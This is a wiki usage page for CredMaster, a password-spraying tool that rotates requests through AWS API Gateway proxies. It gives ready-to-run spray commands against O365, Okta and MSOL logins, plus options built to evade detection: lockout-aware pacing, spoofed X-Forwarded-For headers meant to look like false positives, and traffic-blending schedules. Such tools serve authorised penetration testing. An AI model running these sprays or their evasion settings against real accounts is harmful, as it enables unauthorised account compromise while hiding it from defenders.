Skip to content

Usage

Jump to bottom
Ellis Springe edited this page Feb 20, 2024 · 10 revisions

A few prerequisites are required to use CredMaster to the fullest.

  • AWS access keys
  • Python3
  • A supported target

AWS access keys can be acquired from the AWS website, a helpful blog can be found here: https://bond-o.medium.com/aws-pass-through-proxy-84f1f7fa4b4b

Example Usage

This will run the o365 module with 5 threads and a 10-20 second jitter. It will attempt 3 passwords every 6 hrs (360 min).

python3 credmaster.py --access_key <key> --secret_access_key <key> \
    --plugin o365 \
    -u userfile.txt -p passfile.txt -a useragents.txt -o outputfile \
    -t 5 -j 20 -m 10 -d 360 --passwordsperdelay 3

This will run the Okta module with one thread and a 10-30 second jitter. It will attempt one password every one hour (60 min) with a randomized user list.

python3 credmaster.py --access_key <key> --secret_access_key <key> \
    --plugin okta -u userfile.txt -p passfile.txt -a useragents.txt -o outputfile \
    -t 1 -j 30 -m 10 -d 60 --passwordsperdelay 1 -r --url https://example.okta.com

This will run the MSOL module with a userpass file and config file, with a custom header on each request for attribution

python3 credmaster.py --config aws.config --plugin msol -f userpass.txt -a useragents.txt --header "X-ID: ABCD"

Utilities

Destroy all FireProx created APIs

python3 credmaster.py {access args} --clean

List all APIs with ID, name and creation date

python3 credmaster.py {access args} --api_list

Delete a single API

python3 credmaster.py {access args} --api_destroy {api id}

Help Message

options:
  -h, --help            show this help message and exit

Basic Inputs:
  --plugin PLUGIN       Spray plugin
  -u USERFILE, --userfile USERFILE
                        Username file
  -p PASSWORDFILE, --passwordfile PASSWORDFILE
                        Password file
  -f USERPASSFILE, --userpassfile USERPASSFILE
                        Username-Password file (one-to-one map, colon separated)
  -a USERAGENTFILE, --useragentfile USERAGENTFILE
                        Useragent file
  --config CONFIG       Configure CredMaster using config file config.json

Advanced Inputs:
  -o OUTFILE, --outfile OUTFILE
                        Output file to write contents (omit extension)
  -t THREADS, --threads THREADS
                        Thread count (default 1, max 15)
  --region REGION       Specify AWS Region to create API Gateways in
  -j JITTER, --jitter JITTER
                        Jitter delay between requests in seconds (applies per-thread)
  -m JITTER_MIN, --jitter_min JITTER_MIN
                        Minimum jitter time in seconds, defaults to 0
  -d DELAY, --delay DELAY
                        Delay between unique passwords, in minutes
  --passwordsperdelay PASSWORDSPERDELAY
                        Number of passwords to be tested per delay cycle
  --batch_size BATCH_SIZE
                        Number of request to perform per thread
  --batch_delay BATCH_DELAY
                        Delay between each thread batch, in minutes
  -r, --randomize       Randomize the input list of usernames to spray (will remain the same password)
  --header HEADER       Add a custom header to each request for attribution, specify "X-Header: value"
  --xforwardedfor XFORWARDEDFOR
                        Make the X-Forwarded-For header a static IP instead of RNG
  --weekday_warrior WEEKDAY_WARRIOR
                        If you don't know what this is don't use it, input is timezone UTC offset
  --color               Output spray results in Green/Yellow/Red colors
  --trim, --remove      Remove users with found credentials from future sprays

Notification Inputs:
  --slack_webhook SLACK_WEBHOOK
                        Webhook link for Slack notifications
  --pushover_token PUSHOVER_TOKEN
                        Token for Pushover notifications
  --pushover_user PUSHOVER_USER
                        User for Pushover notifications
  --ntfy_topic NTFY_TOPIC
                        Topic for Ntfy notifications
  --ntfy_host NTFY_HOST
                        Ntfy host for notifications
  --ntfy_token NTFY_TOKEN
                        Ntfy token for private instances
  --discord_webhook DISCORD_WEBHOOK
                        Webhook link for Discord notifications
  --teams_webhook TEAMS_WEBHOOK
                        Webhook link for Teams notifications
  --keybase_webhook KEYBASE_WEBHOOK
                        Webhook for Keybase notifications
  --operator_id OPERATOR_ID
                        Optional Operator ID for notifications
  --exclude_password    Exclude discovered password in Notification message

Fireprox Connection Inputs:
  --profile_name PROFILE_NAME, --profile PROFILE_NAME
                        AWS Profile Name to store/retrieve credentials
  --access_key ACCESS_KEY
                        AWS Access Key
  --secret_access_key SECRET_ACCESS_KEY
                        AWS Secret Access Key
  --session_token SESSION_TOKEN
                        AWS Session Token

Fireprox Utility Options:
  --clean               Clean up all fireprox AWS APIs from every region, warning irreversible
  --api_destroy API_DESTROY
                        Destroy single API instance, by API ID
  --api_list            List all fireprox APIs

Command line option details

  • --threads - The number of attempts to make at the same time. Each thread is a unique AWS region so there is less overlap. The max number of threads is 15
  • --useragentfile - A list of user agents to rotate through while password spraying
  • --userpassfile - A file containing username and password combinations, separated by a colon
  • --plugin - The module/target you wish to use during your password spraying attempts
  • --jitter and --jitter_min - Upper and lower jitter limits, alters time between login attempts
  • --delay - Provided with a password list, this option allows you to set the amount of time to wait before attempting the next password in the file. This is helpful for preventing rate-limiting and account lockouts.
  • --randomize - Take the input list of users and randomize the order in which the users are attempted
  • --header - Add a custom specified header to each authentication request made. Helpful for when a client wants to know which attempts were yours, so they can be attributed
  • --xforwardedfor - Statically set the X-Forwarded-For header that by default is randomized. Specifying the fake source IP as part of your client's IP range may make them believe it is a false positive
  • --weekday-warrior - Spray at 7AM, 11AM and 3PM based off an input UTC time, best for blending into network traffic
  • --passwordsperdelay - The number of passwords per delay cycle. This is helpful for when the lockout counter is high (10 passwords) and you can spray more than one password per delay.
  • --access_key, --secret_access_key, --profile_name and --session_token - Parameters for AWS access to create FireProx API proxies for use during spraying.
  • --config - An easy way to specify a file that you can store your AWS access tokens in. A template can be found in this repo.
  • --clean - remove all APIs from AWS. If you cancel your operations mid-spray, credmaster may leave API gateways configured. This cleans them up.
  • --api_destroy - remove a single API by ID
  • --api_list - list all APIs with information about them

Overview

Home

Installation

Usage

Config File

Notifications

Fireprox Utilities

Plugins

Overview

OWA

EWS

ADFS

O365

O365Enum

MSOL

MSGraph

AZVault

AzureSSO

HTTPBrute

HTTPPost

Okta

FortinetVPN

GmailEnum

PingFed

Misc

Development

Weekday Warrior

Throttle Evasion

Anonymity

Credits

Clone this wiki locally